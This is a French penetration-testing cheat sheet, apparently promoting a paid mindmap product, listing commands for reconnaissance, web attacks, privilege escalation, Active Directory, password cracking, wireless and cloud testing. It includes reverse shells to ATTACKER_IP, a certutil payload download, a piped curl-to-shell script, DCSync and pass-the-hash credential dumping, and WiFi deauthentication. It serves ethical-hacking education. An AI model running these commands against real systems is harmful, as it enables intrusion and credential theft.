# Reconnaissance
La collecte d'informations est la base de tout test d'intrusion. Commencez par la recon passive, puis passez au scan actif.
Nmap — Découverte réseau
nmap -sC -sV -oA scan_results TARGET_IP
Scripts par défaut + détection de version avec sortie dans tous les formats
nmap -p- -T4 --min-rate=1000 TARGET_IP
Scan TCP complet — mode rapide
nmap -sU --top-ports 200 TARGET_IP
Scan UDP sur les 200 ports les plus courants
nmap --script vuln TARGET_IP
Exécuter tous les scripts de détection de vulnérabilités
Énumération de sous-domaines & DNS
subfinder -d TARGET_DOMAIN -o subdomains.txt
Énumération passive de sous-domaines
amass enum -d TARGET_DOMAIN -o amass_results.txt
Énumération approfondie avec OSINT
dig axfr @DNS_SERVER TARGET_DOMAIN
Tentative de transfert de zone DNS
Brute-force de répertoires & fichiers
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
Brute-force récursif rapide de répertoires avec extensions
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
Brute-force classique de répertoires avec 50 threads
# Hacking d'Applications Web
Testez les vulnérabilités du Top 10 OWASP : SQLi, XSS, SSRF, IDOR, contournement d'authentification, et plus.
Injection SQL
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
Détection automatique de SQLi + énumération des bases de données
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
Énumérer les tables d'une base de données spécifique
sqlmap -r request.txt --level 5 --risk 3 --batch
SQLi depuis une requête Burp sauvegardée avec niveau max
XSS (Cross-Site Scripting)
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
Scanner XSS automatisé avec callback pour XSS aveugle
SSRF & LFI
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
Fuzzing SSRF avec correspondance de réponse
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
Fuzzing d'inclusion de fichier local (LFI)
Burp Suite — Essentiels
curl -x http://127.0.0.1:8080 -k https://TARGET
Router le trafic via le proxy Burp
# Services Réseau
Protocoles et services courants lors des tests d'intrusion : SMB, FTP, SSH, HTTP, SNMP.
Énumération SMB
smbclient -L //TARGET_IP -N
Lister les partages SMB anonymement
enum4linux -a TARGET_IP
Énumération complète SMB/NetBIOS
crackmapexec smb TARGET_IP -u '' -p '' --shares
Énumérer les partages avec session nulle
FTP
ftp TARGET_IP # Essayer anonymous:anonymous
Connexion avec accès anonyme
SNMP
snmpwalk -v2c -c public TARGET_IP
Parcourir l'arbre SNMP avec la community string « public »
# Escalade de Privilèges Linux
Après avoir obtenu un shell, escaladez vers root. Vérifiez les SUID, capabilities, cron jobs et exploits kernel.
Scripts d'énumération
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Exécuter LinPEAS pour l'énumération automatisée de privesc
Binaires SUID
find / -perm -4000 -type f 2>/dev/null
Trouver tous les binaires SUID — à croiser avec GTFOBins
Capabilities
getcap -r / 2>/dev/null
Lister les fichiers avec des capabilities Linux
Tâches Cron
cat /etc/crontab && ls -la /etc/cron.* && crontab -l
Vérifier toutes les tâches cron planifiées
Mauvaise configuration Sudo
sudo -l
Lister les commandes que l'utilisateur actuel peut exécuter en sudo
/etc/passwd inscriptible
openssl passwd -1 -salt hacker password123
Générer un hash de mot de passe à injecter dans /etc/passwd si inscriptible
# Escalade de Privilèges Windows
Escaladez d'un utilisateur bas privilège à SYSTEM. Impersonation de tokens, abus de services, chemins non-quotés.
Énumération
winPEASany.exe quiet fast searchfast
Exécuter WinPEAS pour l'énumération automatisée de privesc Windows
whoami /priv
Vérifier les privilèges actuels — chercher SeImpersonate, SeBackup
Impersonation de Token
.\GodPotato.exe -cmd "cmd /c whoami"
Exploiter SeImpersonatePrivilege (Windows Server 2019+)
Chemins de service non-quotés
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
Trouver les services avec des chemins non-quotés hors répertoires système
# Active Directory
Pentesting AD : énumérer les utilisateurs, kerberoast, AS-REP roast, pass-the-hash, DCSync.
Énumération
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
Collecter les données BloodHound à distance
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Énumération d'utilisateurs via LDAP
Kerberoasting
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
Demander des tickets TGS pour du cracking hors-ligne
AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -outputfile asrep.txt
Trouver les comptes sans pré-authentification
Pass-the-Hash
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH
Obtenir un shell avec le hash NTLM (pas besoin de mot de passe)
DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm
Extraire tous les hashes NTLM du domaine via DCSync
# Attaques de Mots de Passe
Cracker des hashes, brute-forcer des services, et pulvériser des identifiants sur le réseau.
Cracking de hashes
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
Cracker des hashes NTLM avec des règles
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Cracker des hashes avec John the Ripper
Brute-force en ligne
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
Brute-force SSH (4 threads pour éviter le verrouillage)
Password Spraying
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
Pulvérisation de mot de passe SMB sur une liste d'utilisateurs
# Post-Exploitation
Après avoir obtenu l'accès : établir la persistance, pivoter, exfiltrer les données.
Transfert de fichiers
python3 -m http.server 8080
Serveur HTTP rapide pour transférer des fichiers
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Télécharger un fichier sur la cible Windows
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Reverse shell Bash
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Reverse shell Python
Upgrade de shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Passer à un TTY interactif
Pivoting
chisel server -p 8000 --reverse # Sur l'attaquant
chisel client ATTACKER_IP:8000 R:socks # Sur la cible
Mettre en place un proxy SOCKS via l'hôte compromis
# Attaques Sans-fil
Pentesting WiFi : capturer des handshakes, cracker du WPA2, points d'accès pirates.
airmon-ng start wlan0
Activer le mode moniteur
airodump-ng wlan0mon
Scanner les réseaux sans-fil à proximité
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
Capturer les paquets du réseau cible
aireplay-ng -0 5 -a BSSID wlan0mon
Attaque deauth pour capturer le handshake WPA
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Cracker le handshake WPA2 hors-ligne
# Cloud & Kubernetes
Énumérer les assets cloud, exploiter les mauvaises configurations AWS, Azure, GCP et Kubernetes.
AWS
aws sts get-caller-identity
Vérifier l'identité AWS actuelle
aws s3 ls s3://BUCKET_NAME --no-sign-request
Lister le contenu d'un bucket S3 public
Kubernetes
kubectl get pods --all-namespaces
Lister tous les pods dans tous les namespaces
kubectl auth can-i --list
Vérifier les permissions actuelles
📚 Ressources Complémentaires
- Glossaire Pentesting — 60+ termes de cybersécurité expliqués pour les hackers éthiques
- Guide : Débuter en Pentesting — Guide pas à pas avec méthodologie et outils
Envie de 11 600+ commandes dans une mindmap interactive ?
Cet aide-mémoire ne montre qu'une fraction de ce que Pentest Mindmap offre. 32 catégories, recherche instantanée et copie en 1 clic — organisé en carte mentale interactive.
Essai Gratuit 7 Jours →